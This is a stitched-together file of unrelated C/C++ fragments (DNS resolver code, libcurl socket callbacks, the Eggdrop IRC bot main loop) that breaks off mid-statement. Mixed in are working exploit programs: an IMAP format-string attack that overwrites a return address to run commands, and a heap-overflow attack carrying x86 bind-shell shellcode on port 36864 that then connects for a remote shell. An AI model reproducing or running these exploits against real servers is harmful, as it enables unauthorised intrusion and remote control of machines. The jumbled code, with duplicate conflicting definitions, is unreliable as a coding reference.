void
resolv_conf::reload_cb (ref<bool> d, bool failure, str newres)
{
if (*d)
return;
nbump = 0;
reload_lock = false;
last_reload = timenow;
if (!newres) {
warn ("resolv_conf::reload_cb: fork: %m\n");
setsock (true);
return;
}
if (newres.len () != sizeof (_res)) {
warn ("resolv_conf::reload_cb: short read\n");
setsock (true);
return;
}
char oldnsaddr[sizeof (_res.nsaddr_list)];
memcpy (oldnsaddr, _res.nsaddr_list, sizeof (oldnsaddr));
memcpy (&_res, newres, sizeof (_res));
if (memcmp (oldnsaddr, _res.nsaddr_list, sizeof (oldnsaddr))) {
warn ("reloaded DNS configuration (resolv.conf)\n");
ns_idx = _res.nscount ? _res.nscount - 1 : 0;
//nbump = 0;
last_reload = timenow;
setsock (true);
}
else
setsock (failure);
}
void
resolver::pktready (bool tcp, u_char *qb, ssize_t n)
{
if (n <= 0) {
if (tcp) {
tcpsock = NULL;
if (!last_resp)
setsock (true);
last_resp = 0;
resend (false, true);
}
else {
udpsock = NULL;
setsock (true);
}
return;
}
nbump = 0;
last_resp = timenow;
dnsparse reply (qb, n);
question q;
if (!reply.qparse (&q) || q.q_class != C_IN)
return;
dnsreq *r;
for (r = reqtab[reply.hdr->id];
r && (r->usetcp != tcp || r->type != q.q_type
|| strcasecmp (r->name, q.q_name));
r = reqtab.nextkeq (r))
;
if (!r)
return;
if (reply.error && !r->error)
r->error = reply.error;
if (r->error == NXDOMAIN) {
r->error = 0;
r->start (true);
}
else if (!r->error && !r->usetcp && reply.hdr->tc) {
reqtoq.remove (r);
r->usetcp = true;
r->xmit (0);
}
else
r->readreply (r->error ? NULL : &reply);
}
void
resolver::udpcheck_cb (ptr<hostent> h, int err)
{
udpcheck_req = NULL;
if (err == ARERR_TIMEOUT)
setsock (true);
}
/* Initialize a new SockInfo structure */
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g) {
SockInfo *fdp = calloc(sizeof(SockInfo), 1);
fdp->global = g;
setsock(fdp, s, easy, action, g);
curl_multi_assign(g->multi, s, fdp);
}
/* CURLMOPT_SOCKETFUNCTION */
static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp) {
std::cout << std::endl << __PRETTY_FUNCTION__ << " called" << std::endl;
fprintf(MSG_OUT, "\nsock_cb: socket=%d, what=%d, sockp=%p", s, what, sockp);
GlobalInfo *g = (GlobalInfo*) cbp;
int *actionp = (int *) sockp;
const char *whatstr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" };
fprintf(MSG_OUT, "\nsocket callback: s=%d e=%p what=%s ", s, e,
whatstr[what]);
if (what == CURL_POLL_REMOVE) {
fprintf(MSG_OUT, "\n");
remsock(actionp, g);
} else {
if (!actionp) {
fprintf(MSG_OUT, "\nAdding data: %s", whatstr[what]);
addsock(s, e, what, g);
} else {
fprintf(MSG_OUT, "\nChanging action from %s to %s",
whatstr[*actionp], whatstr[what]);
setsock(actionp, s, e, what, *actionp, g);
}
}
return 0;
}
/* CURLMOPT_SOCKETFUNCTION */
static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp)
{
GlobalInfo *g = (GlobalInfo*) cbp;
SockInfo *fdp = (SockInfo*) sockp;
static const char *whatstr[]={ "none", "IN", "OUT", "INOUT", "REMOVE" };
MSG_OUT("socket callback: s=%d e=%p what=%s ", s, e, whatstr[what]);
if (what == CURL_POLL_REMOVE) {
MSG_OUT("\n");
remsock(fdp);
} else {
if (!fdp) {
MSG_OUT("Adding data: %s%s\n",
what&CURL_POLL_IN?"READ":"",
what&CURL_POLL_OUT?"WRITE":"" );
addsock(s, e, what, g);
}
else {
MSG_OUT(
"Changing action from %d to %d\n", fdp->action, what);
setsock(fdp, s, e, what, g);
}
}
return 0;
}
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g)
{
int *fdp = (int *)calloc(sizeof(int), 1); /* fdp is used to store current action */
setsock(fdp, s, easy, action, g);
curl_multi_assign(g->multi, s, fdp);
}
/* CURLMOPT_SOCKETFUNCTION */
int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp)
{
struct http_m_global *g = (struct http_m_global*) cbp;
struct http_m_cell *cell = (struct http_m_cell*)sockp;
const char *whatstr[]={ "none", "IN", "OUT", "INOUT", "REMOVE" };
LM_DBG("socket callback: s=%d e=%p what=%s\n", s, e, whatstr[what]);
if (what == CURL_POLL_REMOVE) {
/* if cell is NULL the handle has been removed by the event callback for timeout */
if (cell) {
if (cell->evset && cell->ev) {
LM_DBG("freeing event %p\n", cell->ev);
event_del(cell->ev);
event_free(cell->ev);
cell->ev=NULL;
cell->evset=0;
}
}
else {
LM_DBG("REMOVE action without cell, handler timed out.\n");
}
}
else {
if (!cell) {
LM_DBG("Adding data: %s\n", whatstr[what]);
addsock(s, e, what, g);
}
else {
LM_DBG("Changing action from %s to %s\n",
whatstr[cell->action], whatstr[what]);
setsock(cell, s, e, what);
}
}
return 0;
}
/* CURLMOPT_SOCKETFUNCTION */
static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp)
{
GlobalInfo *g = (GlobalInfo*) cbp;
SockInfo *fdp = (SockInfo*) sockp;
const char *whatstr[]={ "none", "IN", "OUT", "INOUT", "REMOVE" };
fprintf(MSG_OUT,
"socket callback: s=%d e=%p what=%s ", s, e, whatstr[what]);
if (what == CURL_POLL_REMOVE) {
fprintf(MSG_OUT, "\n");
remsock(fdp);
}
else {
if (!fdp) {
fprintf(MSG_OUT, "Adding data: %s\n", whatstr[what]);
addsock(s, e, what, g);
}
else {
fprintf(MSG_OUT,
"Changing action from %s to %s\n",
whatstr[fdp->action], whatstr[what]);
setsock(fdp, s, e, what, g);
}
}
return 0;
}
/* Notifies about updates on a socket file descriptor */
static int sock_cb(CURL *handle, curl_socket_t curl_soc, int what, void *cbp,
void *sockp)
{
orcout(orcm_debug, "%s handle %p curl_soc %i what %i cbp %p sockp %p\n",
__PRETTY_FUNCTION__, handle, curl_soc, what, cbp, sockp);
global_info *global = (global_info *)cbp;
sock_info *soc = (sock_info *)sockp;
const char *whatstr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" };
orcout(orcm_debug, "socket callback: s=%d e=%p what=%s ",
curl_soc, handle, whatstr[what]);
if (what == CURL_POLL_REMOVE) {
orcout(orcm_debug, "\n");
remsock(soc, global);
} else {
if (!soc) {
orcout(orcm_debug, "Adding data: %s\n", whatstr[what]);
addsock(curl_soc, handle, what, global);
} else {
orcout(orcm_debug, "Changing action from %s to %s\n",
whatstr[soc->action], whatstr[what]);
setsock(soc, curl_soc, handle, what, global);
}
}
return 0;
}
/* CURLMOPT_SOCKETFUNCTION */
int sock_cb(CURL *e, curl_socket_t s, int what, Context* c, int* actionp)
{
TRACE("sock_cb");
setsock(s, e, what, c);
return 0;
}
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g) {
std::cout << std::endl << __PRETTY_FUNCTION__ << " called" << std::endl;
/* fdp is used to store current action */
int *fdp = (int *) calloc(sizeof(int), 1);
setsock(fdp, s, easy, action, 0, g);
curl_multi_assign(g->multi, s, fdp);
}
void setsock(curl_socket_t s, CURL*e, int act, Context* c)
{
boost::asio::ip::tcp::socket* tcp_socket;
tcp_socket = c->socket_map_.find(s);
if (!tcp_socket) return;
setsock(tcp_socket, e, act, c);
}
/* Initialize a new SockInfo structure */
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g)
{
SockInfo *fdp = g_malloc0(sizeof(SockInfo));
fdp->global = g;
fdp->ch=g_io_channel_unix_new(s);
setsock(fdp, s, easy, action, g);
curl_multi_assign(g->multi, s, fdp);
}
int getsock(int options)
{
int sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
fatal("Can't open a socket at all!", 0);
setsock(sock, options);
return sock;
}
/* Initialize a new SockInfo structure */
static void addsock(curl_socket_t curl_soc, CURL *handle, int action,
global_info *global)
{
sock_info *soc = calloc(sizeof(sock_info), 1);
soc->global = global;
setsock(soc, curl_soc, handle, action, global);
curl_multi_assign(global->multi, curl_soc, soc);
}
void
resolver::sendreq (dnsreq *r)
{
if (!udpsock) {
setsock (false);
return;
}
ptr<dnssock> sock;
if (!r->usetcp)
sock = udpsock;
else if (!tcpsock && !tcpinit ()) {
setsock (true);
return;
}
else
sock = tcpsock;
u_char qb[QBSIZE];
int n;
n = res_mkquery (QUERY, r->name, C_IN, r->type,
NULL, 0, NULL, qb, sizeof (qb));
//warn ("query (%s, %d): %d\n", r->name.cstr (), r->type, n);
if (n < 0) {
r->fail (ARERR_REQINVAL);
return;
}
HEADER *const h = (HEADER *) qb;
h->id = r->id;
h->rd = 1;
/* FreeBSD (and possibly other OSes) have a broken dn_expand
* function that doesn't properly invert dn_comp.
*/
{
dnsparse query (qb, n, false);
question q;
if (query.qparse (&q))
r->name = q.q_name;
}
sock->sendpkt (qb, n);
}
static void
addsock( curl_socket_t sockfd,
int action,
struct tr_web * g )
{
struct tr_web_sockinfo * f = tr_new0( struct tr_web_sockinfo, 1 );
dbgmsg( "creating a sockinfo %p for fd %d", f, sockfd );
setsock( sockfd, action, g, f );
curl_multi_assign( g->multi, sockfd, f );
}
/* assign a socket to the multi handler */
void addsock(curl_socket_t s, CURL *easy, int action, struct http_m_global *g)
{
struct http_m_cell *cell;
cell = http_m_cell_lookup(easy);
if (!cell)
return;
setsock(cell, s, cell->easy, action);
curl_multi_assign(g->multi, s, cell);
}
int getsock(int options)
{
int sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock >= 0)
setsock(sock, options);
else
putlog(LOG_MISC, "*", "Warning: Can't create new socket!");
return sock;
}
int main(int argc,char *argv[]){
int sflag=DF_SFLAG;
unsigned long do_system_addr=DO_SYSTEM;
unsigned long retloc=DTOR_END_ADDR;
unsigned long shaddr=SHELL;
char host[256]=DEF_STR;
int port=PORT;
extern char *optarg;
int sock,i,r=0;
char buf[1024];
char user[256]=DEF_STR;
char pass[256]=DEF_STR;
char *ptr=NULL;
char xhost_ip_buf[256]=XHOST_IP;
get_10_ip(xhost_ip_buf);
memset((char *)buf,0,sizeof(buf));
memset((char *)user,0,sizeof(user));
memset((char *)pass,0,sizeof(pass));
(void)banrl();
while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){
switch(sock){
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'D':
case 'd':
do_system_addr=strtoul(optarg,NULL,0);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case 'F':
case 'f':
sflag=atoi(optarg);
break;
case 'I':
case 'i':
memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf));
strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1);
get_10_ip(xhost_ip_buf);
break;
case 'U':
case 'u':
memset((char *)user,0,sizeof(user));
strncpy(user,optarg,sizeof(user)-1);
break;
case 'S':
case 's':
memset((char *)pass,0,sizeof(pass));
strncpy(pass,optarg,sizeof(pass)-1);
break;
case '?':
default:
(void)usage(argv[0]);
break;
}
}
if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){
(void)usage(argv[0]);
}
fprintf(stdout," [+] make socket.\n");
fprintf(stdout," [+] host: %s.\n",host);
fprintf(stdout," [+] port: %d.\n",port);
sock=setsock(host,port);
re_connt(sock);
recv(sock,buf,sizeof(buf)-1,0);
if(strstr(buf,"IMAP4rev1")){
fprintf(stdout," [+] OK, IMAP4rev1.\n");
}
else {
fprintf(stdout," [-] Ooops, no match.\n\n");
close(sock);
exit(-1);
}
memset((char *)buf,0,sizeof(buf));
snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass);
send(sock,buf,strlen(buf),0);
memset((char *)buf,0,sizeof(buf));
while(recv(sock,buf,sizeof(buf)-1,0)){
if(strstr(buf," Completed")){
fprintf(stdout," [+] login completed.\n");
break;
}
else if(strstr(buf," rejected")){
fprintf(stdout," [-] login failed.\n\n");
exit(-1);
}
}
memset((char *)buf,0,sizeof(buf));
snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n");
send(sock,buf,strlen(buf),0);
memset((char *)buf,0,sizeof(buf));
while(recv(sock,buf,sizeof(buf)-1,0)){
if(strstr(buf," Completed")){
fprintf(stdout," [+] select success.\n");
break;
}
else if(strstr(buf," NO SELECT")){
fprintf(stdout," [-] select failed.\n\n");
exit(-1);
}
}
/* get, do_system address */
fprintf(stdout," [+] find do_system address.\n");
memset((char *)buf,0,sizeof(buf));
snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG);
send(sock,buf,strlen(buf),0);
memset((char *)buf,0,sizeof(buf));
recv(sock,buf,sizeof(buf)-1,0);
if(strstr(buf,"|")){
ptr=(char *)strstr(buf,"|");
sscanf(ptr,"|%x|\n",&do_system_addr);
}
do_system_addr-=DEF_DO_SYSTEM_OFFSET;
fprintf(stdout," [+] make exploit code.\n");
fprintf(stdout," [+] retloc address: %p.\n",retloc);
fprintf(stdout," [+] do_system address: %p.\n",do_system_addr);
fprintf(stdout," [+] send exploit code.\n");
send_exploit_code(sock,retloc,do_system_addr,sflag);
for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){
send_exploit_code(sock,retloc+r,xterm_shell[i],sflag);
}
#define LOGOUT_CMD "1 logout\n"
send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0);
sleep(1);
recv(sock,buf,sizeof(buf)-1,0);
close(sock);
if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){
fprintf(stdout," [+] logout success.\n\n");
}
else {
fprintf(stdout," [-] logout failed.\n\n");
exit(-1);
}
exit(0);
}
int main(int argc, char **argv)
{
int xx, i;
#ifdef STOP_UAC
int nvpair[2];
#endif
char buf[520], s[25];
FILE *f;
#ifndef ENABLE_STRIP
struct rlimit cdlim;
#endif
/* Don't allow Eggdrop to run as root. */
if (((int) getuid() == 0) || ((int) geteuid() == 0))
fatal("ERROR: Eggdrop will not run as root!", 0);
#ifndef ENABLE_STRIP
cdlim.rlim_cur = RLIM_INFINITY;
cdlim.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &cdlim);
#endif
#include "patch.h"
/* Version info! */
egg_snprintf(ver, sizeof ver, "eggdrop v%s", egg_version);
egg_snprintf(version, sizeof version,
"Eggdrop v%s (C) 1997 Robey Pointer (C) 2005 Eggheads",
egg_version);
/* Now add on the patchlevel (for Tcl) */
sprintf(&egg_version[strlen(egg_version)], " %u", egg_numver);
strcat(egg_version, egg_xtra);
#ifdef STOP_UAC
nvpair[0] = SSIN_UACPROC;
nvpair[1] = UAC_NOPRINT;
setsysinfo(SSI_NVPAIRS, (char *) nvpair, 1, NULL, 0);
#endif
/* Set up error / signal traps. */
setup_signal_traps();
/* Initialize a few variables before main loop. */
cache_miss = 0;
cache_hit = 0;
chanset = NULL;
now = time(NULL);
egg_memcpy(&nowtm, localtime(&now), sizeof(struct tm));
lastmin = nowtm.tm_min;
/* Initialize random number generator. */
srandom((unsigned int) (now % (getpid() + getppid())));
init_mem();
init_language(1);
/* Process command line arguments. */
process_args(argc, argv);
printf("\n%s\n", version);
init_dcc_max();
init_userent();
logfile_init(0);
init_bots();
init_net();
init_modules();
if (backgrd)
bg_prepare_split();
init_tcl(argc, argv);
init_language(0);
help_init();
traffic_init();
logfile_init(1);
#ifdef STATIC
link_statics();
#endif
strncpyz(s, ctime(&now), sizeof s);
strcpy(&s[11], &s[20]);
putlog(LOG_ALL, "*", "--- Loading %s (%s)", ver, s);
/* Read configuration data. */
readconfig();
/* Check for encryption module. */
if (!encrypt_pass) {
printf(MOD_NOCRYPT);
bg_send_quit(BG_ABORT);
exit(1);
}
putlog(LOG_MISC, "*", "=== %s: %d channels, %d users.", botnetnick,
count_channels(), count_users(userlist));
if (!pid_file[0])
egg_snprintf(pid_file, sizeof pid_file, "pid.%s", botnetnick);
/* Check for pre-existing eggdrop! */
f = fopen(pid_file, "r");
if (f != NULL) {
fgets(s, 10, f);
xx = atoi(s);
kill(xx, SIGCHLD); /* Meaningless kill to determine if PID is used. */
if (errno != ESRCH) {
printf(EGG_RUNNING1, botnetnick);
printf(EGG_RUNNING2, pid_file);
bg_send_quit(BG_ABORT);
exit(1);
}
}
/* Move into background? */
if (backgrd) {
#ifndef CYGWIN_HACKS
bg_do_split();
}
else {
#endif
xx = getpid();
if (xx != 0) {
FILE *fp;
/* Write PID to file. */
unlink(pid_file);
fp = fopen(pid_file, "w");
if (fp != NULL) {
fprintf(fp, "%u\n", xx);
if (fflush(fp)) {
/* Let the bot live since this doesn't appear to be a botchk. */
printf("Cannot not write to '%s' (PID file).\n", pid_file);
fclose(fp);
unlink(pid_file);
}
else
fclose(fp);
}
else
printf("Cannot not write to '%s' (PID file).\n", pid_file);
#ifdef CYGWIN_HACKS
printf("Launched into the background (PID: %d)\n\n", xx);
#endif
}
}
use_stderr = 0; /* Stop writing to stderr now */
if (backgrd) {
/* Ok, try to disassociate from controlling terminal (finger cross) */
#if defined(HAVE_SETPGID) && !defined(CYGWIN_HACKS)
setpgid(0, 0);
#endif
/* Tcl wants the stdin, stdout and stderr file handles kept open. */
freopen("/dev/null", "r", stdin);
freopen("/dev/null", "w", stdout);
freopen("/dev/null", "w", stderr);
#ifdef CYGWIN_HACKS
FreeConsole();
#endif
}
/* Terminal emulating dcc chat */
if (!backgrd && term_z) {
int n = new_dcc(&DCC_CHAT, sizeof(struct chat_info));
dcc[n].addr = iptolong(getmyip());
dcc[n].sock = STDOUT;
dcc[n].timeval = now;
dcc[n].u.chat->con_flags = conmask;
dcc[n].u.chat->strip_flags = STRIP_ALL;
dcc[n].status = STAT_ECHO;
strcpy(dcc[n].nick, "HQ");
strcpy(dcc[n].host, "llama@console");
/* HACK: Workaround not to pass literal "HQ" as a non-const arg */
dcc[n].user = get_user_by_handle(userlist, dcc[n].nick);
/* Make sure there's an innocuous HQ user if needed */
if (!dcc[n].user) {
userlist = adduser(userlist, dcc[n].nick, "none", "-", USER_PARTY);
dcc[n].user = get_user_by_handle(userlist, dcc[n].nick);
}
setsock(STDOUT, 0); /* Entry in net table */
dprintf(n, "\n### ENTERING DCC CHAT SIMULATION ###\n\n");
dcc_chatter(n);
}
then = now;
online_since = now;
autolink_cycle(NULL); /* Hurry and connect to tandem bots. */
add_help_reference("cmds1.help");
add_help_reference("cmds2.help");
add_help_reference("core.help");
/* Create hooks. */
add_hook(HOOK_SECONDLY, (Function) core_secondly);
add_hook(HOOK_MINUTELY, (Function) core_minutely);
add_hook(HOOK_HOURLY, (Function) core_hourly);
add_hook(HOOK_REHASH, (Function) event_rehash);
add_hook(HOOK_PRE_REHASH, (Function) event_prerehash);
add_hook(HOOK_USERFILE, (Function) event_save);
add_hook(HOOK_BACKUP, (Function) backupuserfile);
add_hook(HOOK_DAILY, (Function) event_logfile);
add_hook(HOOK_DAILY, (Function) traffic_reset);
add_hook(HOOK_LOADED, (Function) event_loaded);
call_hook(HOOK_LOADED);
debug0("main: entering loop");
while (1) {
int socket_cleanup = 0;
#ifdef USE_TCL_EVENTS
/* Process a single Tcl event. */
Tcl_DoOneEvent(TCL_ALL_EVENTS | TCL_DONT_WAIT);
#endif
now = time(NULL);
random();
/* Every second... */
if (now != then) {
call_hook(HOOK_SECONDLY);
then = now;
}
/* Only do this every so often. */
if (!socket_cleanup) {
socket_cleanup = 5;
/* Remove dead dcc entries. */
dcc_remove_lost();
/* Check for server or dcc activity. */
dequeue_sockets();
}
else {
socket_cleanup--;
}
/* Free unused structures. */
garbage_collect();
xx = sockgets(buf, &i);
if (xx >= 0) { /* Non-error */
int idx;
for (idx = 0; idx < dcc_total; idx++) {
if (dcc[idx].sock != xx)
continue;
if (dcc[idx].type && dcc[idx].type->activity) {
traffic_update_in(dcc[idx].type, (strlen(buf) + 1)); /* Traffic stats. */
dcc[idx].type->activity(idx, buf, i);
}
else {
putlog(LOG_MISC, "*", "!!! untrapped dcc activity: type %s, sock %d",
dcc[idx].type->name, dcc[idx].sock);
}
break;
}
}
else if (xx == -1) { /* EOF */
int idx;
if (i == STDOUT && !backgrd)
fatal("END OF FILE ON TERMINAL", 0);
for (idx = 0; idx < dcc_total; idx++) {
if (dcc[idx].sock != i)
continue;
if (dcc[idx].type && dcc[idx].type->eof) {
dcc[idx].type->eof(idx);
}
else {
putlog(LOG_MISC, "*",
"*** ATTENTION: DEAD SOCKET (%d) OF TYPE %s UNTRAPPED",
i, dcc[idx].type ? dcc[idx].type->name : "*UNKNOWN*");
killsock(i);
lostdcc(idx);
}
idx = dcc_total + 1;
}
if (idx == dcc_total) {
putlog(LOG_MISC, "*",
"(@) EOF socket %d, not a dcc socket, not anything.", i);
close(i);
killsock(i);
}
}
else if (xx == -2 && errno != EINTR) { /* select() error */
putlog(LOG_MISC, "*", "* Socket error #%d; recovering.", errno);
for (i = 0; i < dcc_total; i++) {
if ((fcntl(dcc[i].sock, F_GETFD, 0) == -1) && (errno == EBADF)) {
putlog(LOG_MISC, "*",
"DCC socket %d (type %d, name '%s') expired -- pfft",
dcc[i].sock, dcc[i].type, dcc[i].nick);
killsock(dcc[i].sock);
lostdcc(i);
i--;
}
}
}
else if (xx == -3) {
call_hook(HOOK_IDLE);
socket_cleanup = 0; /* If we've been idle, cleanup & flush */
}
if (do_restart) {
if (do_restart == -2) {
rehash();
}
else {
int f = 1;
module_entry *p;
Function startfunc;
char name[256];
check_tcl_event("prerestart");
/* Unload as many modules as possible */
while (f) {
f = 0;
for (p = module_list; p != NULL; p = p->next) {
dependancy *d = dependancy_list;
int ok = 1;
while (ok && d) {
if (d->needed == p)
ok = 0;
d = d->next;
}
if (ok) {
strcpy(name, p->name);
if (module_unload(name, botnetnick) == NULL) {
f = 1;
break;
}
}
}
}
/* Make sure we don't have any modules left hanging around other than
* "eggdrop" and the two that are supposed to be.
*/
for (f = 0, p = module_list; p; p = p->next) {
if (strcmp(p->name, "eggdrop") && strcmp(p->name, "encryption") &&
strcmp(p->name, "uptime")) {
f++;
}
}
if (f != 0) {
putlog(LOG_MISC, "*", MOD_STAGNANT);
}
/* Flush log files to disk. */
flushlogs();
/* Clean up Tcl stuff. */
kill_tcl();
/* Initialize stuff again. */
init_tcl(argc, argv);
init_language(0);
help_init();
traffic_init();
logfile_init(1);
/* This resets our modules which we didn't unload (encryption and uptime). */
for (p = module_list; p; p = p->next) {
if (p->funcs) {
startfunc = p->funcs[MODCALL_START];
startfunc(NULL);
}
}
rehash();
restart_chons();
call_hook(HOOK_LOADED);
}
do_restart = 0;
}
}
}
int main(int argc,char *argv[])
{
int at_sock;
int ts_sock;
int port=PORT;
int roup;
char ttatk_code[36864];
char hostname[0x82]=HOST;
char main_str[] = /* BIND SHELL ON PORT TCP/36864 */
//------------------- main: -------------------//
"\xeb\x72" /* jmp callz */
//------------------- start: ------------------//
"\x5e" /* popl %esi */
//------------------ socket() -----------------//
"\x29\xc0" /* subl %eax, %eax */
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
"\x40" /* incl %eax */
"\x89\xc3" /* movl %eax, %ebx */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x40" /* incl %eax */
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------- bind() ------------------//
"\x43" /* incl %ebx */
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
"\x88\x46\x08" /* movb %al, 0x08(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x89\xc2" /* movl %eax, %edx */
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
"\xb0\x90" /* movb $0x90, %al */
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------ listen() -----------------//
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
"\x43" /* incl %ebx */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------ accept() -----------------//
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
"\xb0\x66" /* movb $0x66, %al */
"\x43" /* incl %ebx */
"\xcd\x80" /* int $0x80 */
//---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----//
"\x86\xc3" /* xchgb %al, %bl */
"\xb0\x3f" /* movb $0x3f, %al */
"\x29\xc9" /* subl %ecx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
//------------------ execve() -----------------//
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
"\xb0\x0b" /* movb $0x0b, %al */
"\xcd\x80" /* int $0x80 */
//------------------- callz: ------------------//
"\xe8\x89\xff\xff\xff" /* call start */
"/bin/sh"; /* 128byte */
#define plus_4str(x0x) x0x+=4
int x0x_num=0;
int x0x_size=0;
#define BUF_LEN 1024
char *debug_test;
char code_128len[BUF_LEN];
char x82_16x0x[]={ /* 16byte */
0x82,0x82,0x82,0x82,0x82,
0x82,0x82,0x82,0x82,0x82,
0x82,0x82,0x82,0x82,0x82,
0x82
};
char nop_n_jump[4]={0x41,0xeb,0x0c,0x42};
int nop_12jump=0;
int ok_cont=0;
int target_type_number=0;
char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */
char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */
char atk_chunk[BUF_LEN];
unsigned long retloc=pl_form[target_type_number].retloc;
unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr;
memset(ttatk_code,0x00,36864);
memset(atk_chunk,0x00,BUF_LEN);
memset(code_128len,0x00,BUF_LEN);
(void)banrl(argv[0]);
while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF)
{
switch(roup)
{
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
retaddr=strtoul(optarg,NULL,0);
break;
case 'H':
case 'h':
memset(hostname,0x00,0x82);
strncpy(hostname,optarg,0x82);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case '?':
(void)usage(argv[0]);
break;
}
}
//--- make fake chunk ---//
fprintf(stdout," [1] Make fake chunk.\n");
for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++)
atk_chunk[x0x_num]=x82_16x0x[x0x_num];
*(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P)
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=retaddr; // Back pointer
plus_4str(x0x_num);
//--- make code ---//
fprintf(stdout," [2] Make shellcode.\n");
for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump))
*(long*)&code_128len[nop_12jump]=0x41eb0c42;
for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++)
code_128len[ok_cont++]=main_str[x0x_num];
//--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---//
snprintf(ttatk_code,36864,
"%s%s%s\r\n",atk_chunk,"\x20",code_128len);
fprintf(stdout," [3] Send exploit (bindshell) code.\n");
{ // Try two times connections. It's Point. :-)
/* 1 */
at_sock=setsock(hostname,port);
re_conenter(at_sock);
send(at_sock,ttatk_code,strlen(ttatk_code),0);
close(at_sock);
/* 2 */
at_sock=setsock(hostname,port);
re_conenter(at_sock);
send(at_sock,ttatk_code,strlen(ttatk_code),0);
}
fprintf(stdout," [4] Waiting, executes the shell !\n");
sleep(3);
fprintf(stdout," [5] Trying %s:36864 ...\n",hostname);
/* 3 */
ts_sock=setsock(hostname,36864);
re_conenter(ts_sock);
fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname);
// Execute bash shell
getshell(ts_sock);
}
int main(int argc,char *argv[])
{
int sock,whtl,type=0,brute_f=0;
char tg_host[0x82]="localhost";
u_long shell=plat[type].shell;
(void)banrl();
if(argc<2)
{
(void)usage(argv[0]);
}
while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
{
extern char *optarg;
switch(whtl)
{
case 'H':
case 'h':
memset((char *)tg_host,0,sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;
case 'S':
case 's':
shell=strtoul(optarg,0,0);
break;
case 'T':
case 't':
if((type=atoi(optarg))>1)
{
(void)usage(argv[0]);
}
else shell=plat[type].shell;
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case 'B':
case 'b':
brute_f++;
break;
case '?':
fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
if(brute_f)
{
